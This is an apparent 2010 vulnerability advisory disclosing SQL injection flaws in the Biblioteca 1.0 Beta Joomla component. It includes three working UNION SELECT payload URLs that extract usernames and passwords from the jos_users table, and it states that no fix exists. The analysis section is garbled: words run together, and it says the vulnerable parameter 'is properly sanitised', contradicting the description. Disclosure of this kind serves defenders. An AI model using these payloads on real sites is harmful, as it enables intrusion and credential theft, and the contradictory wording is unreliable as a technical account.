扫码分享
验证:
体验盒子Biblioteca 1.0 Beta Joomla Component Multiple SQL Injection Vulnerabilities
NameBiblioteca
Vendorhttp://www.cielostellato.info
Versions Affected 1.0 Beta
AuthorSalvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date2010-08-21
X. INDEX
I.ABOUT THE APPLICATION
II. DESCRIPTION
III.ANALYSIS
IV. SAMPLE CODE
V.FIX
I. ABOUT THE APPLICATION
________________________
Componentthatallowsthe automaticmanagementof a
libraryinelectronic format. It' can manage books and
theirloansthrough an attractivegraphicaluser
interface simple and usable.
II. DESCRIPTION
_______________
This component doesn't use the common Joomla's functions
togetthe parameters's value from GET, POST etc.. and
allofthesearenot properly sanitised before being
used in SQL queries.
III. ANALYSIS
_____________
Summary:
A) Multiple Blind SQL Injection
B) Multiple SQL Injection
A) Multiple Blind SQL Injection
_______________________________
Theparametertestopassedtobi.php (site and admin
frontends)isproperly sanitised before being used in a
SQL query.This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.
B) Multiple SQL Injection
_________________________
Theparameter testopassedtostampa.php, pdf.php and
models/biblioteca.php (when "view" is set to "biblioteca"
) isproperly sanitised before being used in SQL queries.
Thiscanbeexploited tomanipulateSQLqueriesby
injecting arbitrary SQL code.
IV. SAMPLE CODE
_______________
A) Multiple SQL Injection
http://host/path/components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
http://host/path/components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
http://host/path/index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
V. FIX
______
No fix.
体验盒子
